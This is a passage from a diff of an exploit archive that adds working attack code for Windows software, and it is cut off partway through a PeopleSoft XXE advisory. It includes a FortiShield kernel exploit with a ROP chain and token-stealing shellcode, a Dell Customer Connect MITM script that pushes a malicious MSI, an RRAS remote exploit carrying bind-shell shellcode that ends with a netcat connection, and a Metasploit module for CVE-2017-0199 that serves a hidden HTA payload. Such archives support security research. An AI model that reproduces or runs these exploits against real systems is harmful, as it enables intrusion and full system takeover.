memcpy(rop_chain + 0xf7d1, &rop_03, 0x08); - memcpy(rop_chain + 0xf7d9, &rop_04, 0x08); - memcpy(rop_chain + 0xf7e1, &rop_05, 0x08); - memcpy(rop_chain + 0xf7e9, &rop_06, 0x08); - memcpy(rop_chain + 0xf7f1, &rop_07, 0x08); - memcpy(rop_chain + 0xf7f9, &rop_08, 0x08); - memcpy(rop_chain + 0xf801, &rop_09, 0x08); - memcpy(rop_chain + 0xf809, &rop_10, 0x08); - memcpy(rop_chain + 0xf811, &rop_11, 0x08); - memcpy(rop_chain + 0xf819, &rop_12, 0x08); - memcpy(rop_chain + 0xf821, &rop_13, 0x08); - memcpy(rop_chain + 0xf829, &rop_14, 0x08); - memcpy(rop_chain + 0xf831, &rop_15, 0x08); - memcpy(rop_chain + 0xf839, &rop_16, 0x08); - memcpy(rop_chain + 0xf841, &rop_17, 0x08); - memcpy(rop_chain + 0xf849, &rop_18, 0x08); - memcpy(rop_chain + 0xf851, &rop_19, 0x08); - memcpy(rop_chain + 0xf859, &rop_20, 0x08); - memcpy(rop_chain + 0xf861, &rop_21, 0x08); - memcpy(rop_chain + 0xf869, &rop_22, 0x08); - memcpy(rop_chain + 0xf871, &rop_23, 0x08); - memcpy(rop_chain + 0xf879, &rop_24, 0x08); - memcpy(rop_chain + 0xf881, &rop_25, 0x08); - memcpy(rop_chain + 0xf889, &rop_26, 0x08); - memcpy(rop_chain + 0xf891, &rop_27, 0x08); - memcpy(rop_chain + 0xf899, &rop_28, 0x08); - memcpy(rop_chain + 0xf8a1, &rop_29, 0x08); - memcpy(rop_chain + 0xf8a9, &rop_30, 0x08); + memset(rop_chain, 0x41, rop_chain_size); + memcpy(rop_chain + 0xf826, &rop_01, 0x08); + memcpy(rop_chain + 0xf82e, &rop_02, 0x08); + memcpy(rop_chain + 0xf836, &rop_03, 0x08); + memcpy(rop_chain + 0xf83e, &rop_04, 0x08); + memcpy(rop_chain + 0xf846, &rop_05, 0x08); + memcpy(rop_chain + 0xf84e, &rop_06, 0x08); + memcpy(rop_chain + 0xf856, &rop_07, 0x08); + memcpy(rop_chain + 0xf85e, &rop_08, 0x08); + memcpy(rop_chain + 0xf866, &rop_09, 0x08); + memcpy(rop_chain + 0xf86e, &rop_10, 0x08); + memcpy(rop_chain + 0xf876, &rop_11, 0x08); + memcpy(rop_chain + 0xf87e, &rop_12, 0x08); + memcpy(rop_chain + 0xf886, &rop_13, 0x08); + memcpy(rop_chain + 0xf88e, &rop_14, 0x08); + memcpy(rop_chain + 0xf896, &rop_15, 0x08); + memcpy(rop_chain + 0xf89e, &rop_16, 0x08); + memcpy(rop_chain + 0xf8a6, &rop_17, 0x08); + memcpy(rop_chain + 0xf8ae, &rop_18, 0x08); + memcpy(rop_chain + 0xf8b6, &rop_19, 0x08); + memcpy(rop_chain + 0xf8be, &rop_20, 0x08); + memcpy(rop_chain + 0xf8c6, &rop_21, 0x08); + memcpy(rop_chain + 0xf8ce, &rop_22, 0x08); + memcpy(rop_chain + 0xf8d6, &rop_23, 0x08); + memcpy(rop_chain + 0xf8de, &rop_24, 0x08); + memcpy(rop_chain + 0xf8e6, &rop_25, 0x08); + memcpy(rop_chain + 0xf8ee, &rop_26, 0x08); + memcpy(rop_chain + 0xf8f6, &rop_27, 0x08); + memcpy(rop_chain + 0xf8fe, &rop_28, 0x08); + memcpy(rop_chain + 0xf906, &rop_29, 0x08); + memcpy(rop_chain + 0xf90e, &rop_30, 0x08); BOOL WPMresult; SIZE_T written; @@ -282,7 +282,7 @@ LPVOID allocate_rop_chain(LPVOID kernel_base, ULONGLONG fortishield_callback, UL LPVOID allocate_shellcode(LPVOID kernel_base, ULONGLONG fortishield_callback, ULONGLONG fortishield_restore, ULONGLONG pte_result) { HANDLE pid; pid = GetCurrentProcess(); - ULONGLONG shellcode_address = 0x0000000048ff07da; + ULONGLONG shellcode_address = 0x000000008aff07da; LPVOID allocate_shellcode; allocate_shellcode = VirtualAlloc((LPVOID*)shellcode_address, 0x12000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (allocate_shellcode == NULL) { @@ -291,12 +291,12 @@ LPVOID allocate_shellcode(LPVOID kernel_base, ULONGLONG fortishield_callback, UL } /* */ - ULONGLONG rop_01 = (ULONGLONG)kernel_base + 0x146cdf; // pop rax; pop rcx; ret + ULONGLONG rop_01 = (ULONGLONG)kernel_base + 0x14adaf; // pop rax; pop rcx; ret ULONGLONG rop_02 = (ULONGLONG)pte_result; // PTE address ULONGLONG rop_03 = 0x0000000000000063; // DIRTY + ACCESSED + R/W + PRESENT - ULONGLONG rop_04 = (ULONGLONG)kernel_base + 0x12e259; // mov byte ptr [rax], cl ; mov rbx, qword ptr [rsp + 8] ; ret - ULONGLONG rop_05 = (ULONGLONG)kernel_base + 0x43d68; // wbinvd ; ret - ULONGLONG rop_06 = 0x000000004900081a; // shellcode + ULONGLONG rop_04 = (ULONGLONG)kernel_base + 0x130779; // mov byte ptr [rax], cl ; mov rbx, qword ptr [rsp + 8] ; ret + ULONGLONG rop_05 = (ULONGLONG)kernel_base + 0xc459c; // wbinvd ; ret + ULONGLONG rop_06 = 0x000000008b00081a; // shellcode ULONGLONG rop_07 = fortishield_callback; ULONGLONG rop_08 = fortishield_restore; /* */ @@ -351,14 +351,14 @@ LPVOID allocate_shellcode(LPVOID kernel_base, ULONGLONG fortishield_callback, UL DWORD shellcode_size = 0x12000; shellcode = (char *)malloc(shellcode_size); memset(shellcode, 0x41, shellcode_size); - memcpy(shellcode + 0xf7c1, &rop_01, 0x08); - memcpy(shellcode + 0xf7c9, &rop_02, 0x08); - memcpy(shellcode + 0xf7d1, &rop_03, 0x08); - memcpy(shellcode + 0xf7d9, &rop_04, 0x08); - memcpy(shellcode + 0xf7e1, &rop_05, 0x08); - memcpy(shellcode + 0xf7e9, &rop_06, 0x08); - memcpy(shellcode + 0xf871, &rop_07, 0x08); - memcpy(shellcode + 0xf879, &rop_08, 0x08); + memcpy(shellcode + 0xf826, &rop_01, 0x08); + memcpy(shellcode + 0xf82e, &rop_02, 0x08); + memcpy(shellcode + 0xf836, &rop_03, 0x08); + memcpy(shellcode + 0xf83e, &rop_04, 0x08); + memcpy(shellcode + 0xf846, &rop_05, 0x08); + memcpy(shellcode + 0xf84e, &rop_06, 0x08); + memcpy(shellcode + 0xf8d6, &rop_07, 0x08); + memcpy(shellcode + 0xf8de, &rop_08, 0x08); memcpy(shellcode + 0x10040, token_steal, sizeof(token_steal)); BOOL WPMresult; @@ -452,7 +452,7 @@ int main() { printf("[+] Manager BitMap pvScan0 offset: %I64x\n", (ULONGLONG)manager_pvScan_offset); printf("[+] Worker BitMap pvScan0 offset: %I64x\n", (ULONGLONG)worker_pvScan_offset); - + HANDLE forti; forti = CreateFile((LPCSTR)"\\\\.\\FortiShield", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); if (forti == INVALID_HANDLE_VALUE) { @@ -462,7 +462,7 @@ int main() { LPVOID kernel_base = GetBaseAddr("ntoskrnl.exe"); LPVOID fortishield_base = GetBaseAddr("FortiShield.sys"); - ULONGLONG kernel_pivot = (ULONGLONG)kernel_base + 0x1468b0; + ULONGLONG kernel_pivot = (ULONGLONG)kernel_base + 0x4efae5; ULONGLONG fortishield_callback = (ULONGLONG)fortishield_base + 0xd150; ULONGLONG fortishield_restore = (ULONGLONG)fortishield_base + 0x2f73; printf("[+] Kernel found at: %llx\n", (ULONGLONG)kernel_base); @@ -495,22 +495,32 @@ int main() { return 1; } + + printf("[+] Press ENTER to trigger the vulnerability.\n"); + getchar(); + + BOOL triggerIOCTL; ResumeThread(hThread); triggerIOCTL = DeviceIoControl(forti, IoControlCode, (LPVOID)&InputBuffer, InputBufferLength, (LPVOID)&OutputBuffer, OutputBufferLength, &lpBytesReturned, NULL); WaitForSingleObject(hThread, INFINITE); /* */ - ULONGLONG manager_write_pte_offset = (ULONGLONG)kernel_base + 0x9c957; + ULONGLONG manager_write_pte_offset = (ULONGLONG)kernel_base + 0x47314 + 0x13; + + printf("[+] Writing nt!MiGetPteAddress + 0x13 to Worker pvScan0.\n"); + getchar(); write_bitmap(bitmaps.manager_bitmap, manager_write_pte_offset); + printf("[+] Reading from Worker pvScan0.\n"); + getchar(); ULONGLONG pte_start = read_bitmap(bitmaps.worker_bitmap); printf("[+] PTE virtual base address: %I64x\n", pte_start); ULONGLONG pte_result; - ULONGLONG pte_value = 0x49000000; + ULONGLONG pte_value = 0x8b000000; pte_result = get_pxe_address_64(pte_value, pte_start); - printf("[+] PTE virtual address for 0x49000000: %I64x\n", pte_result); + printf("[+] PTE virtual address for 0x8b000000: %I64x\n", pte_result); /* */ BOOL VFresult; @@ -538,6 +548,9 @@ int main() { return 1; } + printf("[+] Press ENTER to trigger the vulnerability again.\n"); + getchar(); + ResumeThread(hThread); triggerIOCTL = DeviceIoControl(forti, IoControlCode, (LPVOID)&InputBuffer, InputBufferLength, (LPVOID)&OutputBuffer, OutputBufferLength, &lpBytesReturned, NULL); WaitForSingleObject(hThread, INFINITE); diff --git a/platforms/windows/local/41908.txt b/platforms/win_x86-64/local/41908.txt similarity index 100% rename from platforms/windows/local/41908.txt rename to platforms/win_x86-64/local/41908.txt diff --git a/platforms/windows/dos/41916.py b/platforms/windows/dos/41916.py new file mode 100755 index 000000000..fffc50ae7 --- /dev/null +++ b/platforms/windows/dos/41916.py @@ -0,0 +1,22 @@ +#!/usr/bin/python +# Exploit Title : Private Tunnel VPN Client 2.8 - Local Buffer Overflow (SEH) +# Date : 25/04/2017 +# Exploit Author : Muhann4d +# Vendor Homepage : https://www.privatetunnel.com +# Software Link : https://swupdate.openvpn.org/privatetunnel/client/privatetunnel-win-2.8.exe +# Affected Versions : 2.8 & 2.7 +# Category : Denial of Service (DoS) Local +# Tested on OS : Windows 7 SP1 32bit 64bit +# Proof of Concept : run the exploit, copy the contents of poc.txt, paste it in the password field and press Login. + + +junkA = "\x41" * 1996 +nSEH = "\x42" * 4 +SEH = "\x43" * 4 +junkD = "\x44" * 9000 +f = open ("poc.txt", "w") +f.write(junkA + nSEH + SEH + junkD) +f.close() + + + diff --git a/platforms/windows/local/41917.py b/platforms/windows/local/41917.py new file mode 100755 index 000000000..18257dbba --- /dev/null +++ b/platforms/windows/local/41917.py @@ -0,0 +1,164 @@ +# Exploit Dell Customer Connect 1.3.28.0 Privilege Escalation +# Date: 25.04.2017 +# Software Link: http://www.dell.com/ +# Exploit Author: Kacper Szurek +# Contact: https://twitter.com/KacperSzurek +# Website: https://security.szurek.pl/ +# Category: local + +1. Description + +DCCService.exe is running on autostart as System. + +This service has auto update functionality. + +Basically it periodically checks https://otbs.azurewebsites.net looking for new config file. + +Under normal conditions we cannot spoof this connection because it’s SSL. + +But here WebUtils.sendWebRequest() is executed using Impersonator.RunImpersonated(). + +RunImpersonated() executes given function in the context of currently logged in user. + +In Windows system we can add any certificate to Local user root store. + +Then this certificate is considered as trusted so we can perform MITM attack. + +It can be done using simple proxy server because by default .NET HttpWebRequest() uses IE proxy settings (which can by set by any user without administrator priveleges). + +https://security.szurek.pl/dell-customer-connect-13280-privilege-escalation.html + +2. Proof of Concept + +from _winreg import * +from threading import Thread +import os +import subprocess +import hashlib +import SimpleHTTPServer +import SocketServer +import ssl +import httplib +import time + +msi_file = "exploit.msi" +cert_file = "otbs.crt" +signing_file = "code.cer" +file_port = 5555 +proxy_port = 7777 + +print "Dell Customer Connect 1.3.28.0 Privilege Escalation" +print "by Kacper Szurek" +print "https://security.szurek.pl/" +print "https://twitter.com/KacperSzurek" + +# Simpe SSL proxy based on https://code.google.com/archive/p/proxpy/ +class ProxyHandler(SocketServer.StreamRequestHandler): + def __init__(self, request, client_address, server): + SocketServer.StreamRequestHandler.__init__(self, request, client_address, server) + + def handle(self): + global xml + line = self.rfile.readline() + for l in self.rfile: + if l == "\r\n": + break + + if "GET /api/AppConfig" in line: + conn = httplib.HTTPSConnection(self.host, self.port) + print "\n[+] Send XML to service" + self.wfile.write("HTTP/1.1 200 200\r\n\r\n"+xml) + elif "CONNECT otbs.azurewebsites.net:443" in line: + socket_ssl = ssl.wrap_socket(self.request, server_side = True, certfile = cert_file, ssl_version = ssl.PROTOCOL_SSLv23, do_handshake_on_connect = False) + self.request.send("HTTP/1.1 200 Connection Established\r\n\r\n") + host, port = self.request.getpeername() + self.host = host + self.port = port + while True: + try: + socket_ssl.do_handshake() + break + except (ssl.SSLError, IOError): + return + print "\n[+] SSL Established with otbs.azurewebsites.net" + self.request = socket_ssl + self.setup() + self.handle() + +class ThreadedHTTPProxyServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): + pass + +def add_to_store(name, file): + output = subprocess.Popen('certutil -user -addstore "Root" "{}"'.format(file), stdout=subprocess.PIPE).communicate()[0] + if "\"{}\" already in store".format(name) in output: + print "[+] Certificate {} already in store".format(name) + elif "\"{}\" added to store".format(name) in output: + print "[+] Add certificate {} to user root store".format(name) + else: + print "[-] You need to click OK in order to add cert to user root store" + os._exit(0) + + +if not os.path.isfile(cert_file): + print "[-] Missing SSL file" + os._exit(0) + +if not os.path.isfile(signing_file): + print "[-] Missing code signing file" + os._exit(0) + +add_to_store("otbs.azurewebsites.net", cert_file) +add_to_store("dell inc", signing_file) + +def sha256_checksum(filename, block_size=65536): + sha256 = hashlib.sha256() + with open(filename, 'rb') as f: + for block in iter(lambda: f.read(block_size), b''): + sha256.update(block) + return sha256.hexdigest() + +def file_server(): + Handler = SimpleHTTPServer.SimpleHTTPRequestHandler + httpd = SocketServer.TCPServer(("", file_port), Handler) + httpd.serve_forever() + +if not os.path.isfile(msi_file): + print "[-] Missing msi file" + os._exit(0) + +sha256 = sha256_checksum(msi_file) +print "[+] MSI hash: {}".format(sha256) + +print "[+] Set Proxy Server in registry" +key = OpenKey(HKEY_CURRENT_USER, r'Software\Microsoft\Windows\CurrentVersion\Internet Settings', 0, KEY_ALL_ACCESS) +SetValueEx(key, "ProxyServer", 0, REG_SZ, "127.0.0.1:{}".format(proxy_port)) +SetValueEx(key, "ProxyEnable", 0, REG_DWORD, 1) +CloseKey(key) + +print "[+] Start file server on port {}".format(file_port) +t1 = Thread(target = file_server) +t1.daemon = True +t1.start() + +xml = "9.0.0.6http://localhost:{}/{}{}1".format(file_port, msi_file, sha256) + +print "[+] Start proxy server on port {}".format(proxy_port) +proxy_server = ThreadedHTTPProxyServer(("127.0.0.1", proxy_port), ProxyHandler) +t2 = Thread(target = proxy_server.serve_forever) +t2.daemon = True +t2.start() + +log_path = r"C:\Users\All Users\Dell\Dell Customer Connect\Logs\{}_install_log.txt".format(msi_file) + +print "[+] Waiting for execution ", + +while True: + if os.path.isfile(log_path): + print "\n[+] Looks like msi file was executed, exiting" + os._exit(0) + time.sleep(3) + print ".", + +3. Fix + +http://www.dell.com/support/home/us/en/19/Drivers/DriversDetails?driverId=DR53F \ No newline at end of file diff --git a/platforms/windows/local/41933.txt b/platforms/windows/local/41933.txt new file mode 100755 index 000000000..dd08d3aca --- /dev/null +++ b/platforms/windows/local/41933.txt @@ -0,0 +1,31 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1075 + +Windows: Dolby Audio X2 Service Elevation of Privilege +Platform: Windows 10 + Realtek Audio Driver version 6.0.1.7898 (on a Lenovo P50). Version of the service binary 0.7.2.61 built on 7/18/2016. +Class: Elevation of Privilege + +Summary: +The DAX2API service installed as part of the Realtek Audio Driver on Windows 10 is vulnerable to a privilege escalation vulnerability which allows a normal user to get arbitrary system privileges. + +Description: + +The DAX2API service is a DCOM service written in .NET running at system privileges. The use of .NET for DCOM is inherently unsafe and should not be used. There’s public exploit code to elevate privileges on arbitrary services available at https://github.com/tyranid/ExploitDotNetDCOM. + +Microsoft recommends moving from using DCOM to WCF for .NET services of different privilege levels. See https://blogs.technet.microsoft.com/srd/2014/10/14/more-details-about-cve-2014-4073-elevation-of-privilege-vulnerability/ for more information. + +Proof of Concept: + +To demonstrate the vulnerability download the project https://github.com/tyranid/ExploitDotNetDCOM and compile using Visual Studio. The executable to use is ExploitDotNetDCOMSerialization.exe. + +1) From a command prompt run the command “ExploitDotNetDCOMSerialization.exe 6A28A945-790C-4B68-B0F4-34EEB1626EE3 notepad” +2) Check the currently running processes for the privileged copy of notepad, + +Expected Result: +No privilege escalation occurs. + +Observed Result: +An instance of notepad is running at system privileges. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41933.zip diff --git a/platforms/windows/remote/41929.py b/platforms/windows/remote/41929.py new file mode 100755 index 000000000..362ef9d7e --- /dev/null +++ b/platforms/windows/remote/41929.py @@ -0,0 +1,99 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- +################################################################################## +# By Victor Portal (vportal) for educational porpouse only +################################################################################## +# This exploit is the python version of the ErraticGopher exploit probably # +# with some modifications. ErraticGopher exploits a memory corruption # +# (seems to be a Heap Overflow) in the Windows DCE-RPC Call MIBEntryGet. # +# Because the Magic bytes, the application redirects the execution to the # +# iprtrmgr.dll library, where a instruction REPS MOVS (0x641194f5) copy # +# all te injected stub from the heap to the stack, overwritten a return # +# address as well as the SEH handler stored in the Stack, being possible # +# to control the execution flow to disable DEP and jump to the shellcode # +# as SYSTEM user. # +################################################################################## +#The exploit only works if target has the RRAS service enabled +#Tested on Windows Server 2003 SP2 + +import struct +import sys +import time +import os + +from threading import Thread + +from impacket import smb +from impacket import uuid +from impacket import dcerpc +from impacket.dcerpc.v5 import transport + +target = sys.argv[1] + +print '[-]Initiating connection' +trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % target) +trans.connect() + +print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % target +dce = trans.DCERPC_class(trans) +#RRAS DCE-RPC CALL +dce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0'))) + +egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a" +egghunter += "\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + +#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00" -f python +buf = "" +buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33" +buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc" +buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8" +buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f" +buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35" +buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43" +buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f" +buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01" +buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6" +buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff" +buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2" +buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9" +buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7" +buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51" +buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04" +buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9" +buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23" +buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98" +buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97" +buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5" +buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5" +buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd" +buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b" +buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b" +buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9" +buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90" +buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8" +buf += "\xc4\x25\x3d\xe9" + +#NX disable routine for Windows Server 2003 SP2 +rop = "\x30\xdb\xc0\x71" #push esp, pop ebp, retn ws_32.dll +rop += "\x45"*16 +rop += "\xe9\x77\xc1\x77" #push esp, pop ebp, retn 4 gdi32.dll +rop += "\x5d\x7a\x81\x7c" #ret 20 +rop += "\x71\x42\x38\x77" #jmp esp +rop += "\xf6\xe7\xbd\x77" #add esp,2c ; retn msvcrt.dll +rop += "\x90"*2 + egghunter + "\x90"*42 +rop += "\x17\xf5\x83\x7c" #Disable NX routine +rop += "\x90"*4 + +stub = "\x21\x00\x00\x00\x10\x27\x00\x00\x30\x07\x00\x00\x00\x40\x51\x06\x04\x00\x00\x00\x00\x85\x57\x01\x30\x07\x00\x00\x08\x00\x00\x00" #Magic bytes +stub += "\x41"*20 + rop + "\xCC"*100 + "w00tw00t" + buf + "\x42"*(1313-20-len(rop)-100-8-len(buf)) +stub += "\x12" #Magic byte +stub += "\x46"*522 +stub += "\x04\x00\x00\x00\x00\x00\x00\x00" #Magic bytes + + +dce.call(0x1d, stub) #0x1d MIBEntryGet (vulnerable function) +print "[-]Exploit sent to target successfully..." + +print "Waiting for shell..." +time.sleep(5) +os.system("nc " + target + " 4444") \ No newline at end of file diff --git a/platforms/windows/remote/41934.rb b/platforms/windows/remote/41934.rb new file mode 100755 index 000000000..a64cc695f --- /dev/null +++ b/platforms/windows/remote/41934.rb @@ -0,0 +1,159 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::Remote::HttpServer::HTML + + def initialize(info = {}) + super(update_info(info, + 'Name' => "Microsoft Office Word Malicious Hta Execution", + 'Description' => %q{ + This module creates a malicious RTF file that when opened in + vulnerable versions of Microsoft Word will lead to code execution. + The flaw exists in how a olelink object can make a http(s) request, + and execute hta code in response. + + This bug was originally seen being exploited in the wild starting + in Oct 2016. This module was created by reversing a public + malware sample. + }, + 'Author' => + [ + 'Haifei Li', # vulnerability analysis + 'ryHanson', + 'wdormann', + 'DidierStevens', + 'vysec', + 'Nixawk', # module developer + 'sinn3r' # msf module improvement + ], + 'License' => MSF_LICENSE, + 'References' => [ + ['CVE', '2017-0199'], + ['URL', 'https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/'], + ['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html'], + ['URL', 'https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/'], + ['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html'], + ['URL', 'https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html'], + ['URL', 'https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf'], + ['URL', 'https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/'], + ['URL', 'https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100'], + ['URL', 'https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/'], + ['URL', 'https://www.microsoft.com/en-us/download/details.aspx?id=10725'], + ['URL', 'https://msdn.microsoft.com/en-us/library/dd942294.aspx'], + ['URL', 'https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf'], + ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199'] + ], + 'Platform' => 'win', + 'Targets' => + [ + [ 'Microsoft Office Word', {} ] + ], + 'DefaultOptions' => + { + 'DisablePayloadHandler' => false + }, + 'DefaultTarget' => 0, + 'Privileged' => false, + 'DisclosureDate' => 'Apr 14 2017')) + + register_options([ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']), + OptString.new('URIPATH', [ true, 'The URI to use for the HTA file', 'default.hta']) + ], self.class) + end + + def generate_uri + uri_maxlength = 112 + + host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST'] + scheme = datastore['SSL'] ? 'https' : 'http' + + uri = "#{scheme}://#{host}:#{datastore['SRVPORT']}#{'/' + Rex::FileUtils.normalize_unix_path(datastore['URIPATH'])}" + uri = Rex::Text.hexify(Rex::Text.to_unicode(uri)) + uri.delete!("\n") + uri.delete!("\\x") + uri.delete!("\\") + + padding_length = uri_maxlength * 2 - uri.length + fail_with(Failure::BadConfig, "please use a uri < #{uri_maxlength} bytes ") if padding_length.negative? + padding_length.times { uri << "0" } + uri + end + + def create_ole_ministream_data + # require 'rex/ole' + # ole = Rex::OLE::Storage.new('cve-2017-0199.bin', Rex::OLE::STGM_READ) + # ministream = ole.instance_variable_get(:@ministream) + # ministream_data = ministream.instance_variable_get(:@data) + + ministream_data = "" + ministream_data << "01000002090000000100000000000000" # 00000000: ................ + ministream_data << "0000000000000000a4000000e0c9ea79" # 00000010: ...............y + ministream_data << "f9bace118c8200aa004ba90b8c000000" # 00000020: .........K...... + ministream_data << generate_uri + ministream_data << "00000000795881f43b1d7f48af2c825d" # 000000a0: ....yX..;..H.,.] + ministream_data << "c485276300000000a5ab0000ffffffff" # 000000b0: ..'c............ + ministream_data << "0609020000000000c000000000000046" # 000000c0: ...............F + ministream_data << "00000000ffffffff0000000000000000" # 000000d0: ................ + ministream_data << "906660a637b5d2010000000000000000" # 000000e0: .f`.7........... + ministream_data << "00000000000000000000000000000000" # 000000f0: ................ + ministream_data << "100203000d0000000000000000000000" # 00000100: ................ + ministream_data << "00000000000000000000000000000000" # 00000110: ................ + ministream_data << "00000000000000000000000000000000" # 00000120: ................ + ministream_data << "00000000000000000000000000000000" # 00000130: ................ + ministream_data << "00000000000000000000000000000000" # 00000140: ................ + ministream_data << "00000000000000000000000000000000" # 00000150: ................ + ministream_data << "00000000000000000000000000000000" # 00000160: ................ + ministream_data << "00000000000000000000000000000000" # 00000170: ................ + ministream_data << "00000000000000000000000000000000" # 00000180: ................ + ministream_data << "00000000000000000000000000000000" # 00000190: ................ + ministream_data << "00000000000000000000000000000000" # 000001a0: ................ + ministream_data << "00000000000000000000000000000000" # 000001b0: ................ + ministream_data << "00000000000000000000000000000000" # 000001c0: ................ + ministream_data << "00000000000000000000000000000000" # 000001d0: ................ + ministream_data << "00000000000000000000000000000000" # 000001e0: ................ + ministream_data << "00000000000000000000000000000000" # 000001f0: ................ + ministream_data + end + + def create_rtf_format + template_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2017-0199.rtf") + template_rtf = ::File.open(template_path, 'rb') + + data = template_rtf.read(template_rtf.stat.size) + data.gsub!('MINISTREAM_DATA', create_ole_ministream_data) + template_rtf.close + data + end + + def on_request_uri(cli, req) + p = regenerate_payload(cli) + data = Msf::Util::EXE.to_executable_fmt( + framework, + ARCH_X86, + 'win', + p.encoded, + 'hta-psh', + { :arch => ARCH_X86, :platform => 'win' } + ) + + # This allows the HTA window to be invisible + data.sub!(/\n/, "\nwindow.moveTo -4000, -4000\n") + + send_response(cli, data, 'Content-Type' => 'application/hta') + end + + def exploit + file_create(create_rtf_format) + super + end +end \ No newline at end of file diff --git a/platforms/xml/webapps/41925.txt b/platforms/xml/webapps/41925.txt new file mode 100755 index 000000000..1ddaa79e2 --- /dev/null +++ b/platforms/xml/webapps/41925.txt @@ -0,0 +1,143 @@ +Application: Oracle PeopleSoft +Versions Affected: PeopleSoft HCM 9.2 on PeopleTools 8.55 +Vendor URL: http://oracle.com +Bug: XXE +Reported: 23.12.2016 +Vendor response: 24.12.2016 +Date of Public Advisory: 18.04.2017 +Reference: Oracle CPU April 2017 +Author: Nadya Krivdyuk (ERPScan) + + +Description + +1. ADVISORY INFORMATION +Title:[ERPSCAN-17-020] XXE VIA DOCTYPE in PeopleSoft +PeopleSoftServiceListeningConnector +Advisory ID: [ERPSCAN-17-020] +Risk: high +CVE: CVE-2017-3548 +Advisory URL: https://erpscan.com/advisories/erpscan-17-020-xxe-via-doctype-peoplesoft/ +Date published: 18.04.2017 +Vendors contacted: Oracle + + +2. VULNERABILITY INFORMATION + +Class: XXE +Impact: File disclosure, network discovery +Remotely Exploitable: yes +Locally Exploitable: no + +CVSS Information +CVSS Base Score v3: 8.0 / 10 +CVSS Base Vector: +AV : Attack Vector (Related exploit range) Network (N) +AC : Attack Complexity (Required attack complexity) High (H) +PR : Privileges Required (Level of privileges 